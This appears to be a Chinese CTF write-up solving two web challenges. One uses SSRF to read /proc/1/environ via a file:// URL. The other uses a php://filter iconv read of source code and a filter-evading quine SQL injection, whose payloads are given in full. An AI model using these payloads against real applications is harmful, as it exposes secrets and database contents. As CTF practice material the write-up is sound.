文章目录
- [SDCTF 2022]CURL Up and Read
- [NUSTCTF 2022 新生赛]Translate
[SDCTF 2022]CURL Up and Read
考点:SSRF
打开题目发现是curl命令,提示填入url
尝试http://www.baidu.com
,成功跳转
将url的字符串拿去解码,得到json格式数据
读取下环境变量,得到flag
{"url":"file:///proc/1/environ"}
[NUSTCTF 2022 新生赛]Translate
考点:quine注入
打开题目有登录框,F12发现hint
访问一下
存在filter() 函数可以用于访问 php://filter 伪协议来处理文件
简单测试下,过滤了string,base64。那么我们换个过滤器即可
php://filter/convert.iconv.UTF-8.UTF-16/resource=flag.php
得到源码
考点就是quine注入
发现过滤了char(chr试过但是无回显)
那么用0x绕过
payload
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",0x22,0x27),0x2e,".")#',0x22,0x27),0x2e,'1"/**/union/**/select/**/replace(replace(".",0x22,0x27),0x2e,".")#')#
但是发现事不过三
应该是对replace的过滤,我们大小写绕过
username=admin&password=1'/**/union/**/select/**/replace(REPLACE('1"/**/union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#',0x22,0x27),0x2e,'1"/**/union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#')#
得到flag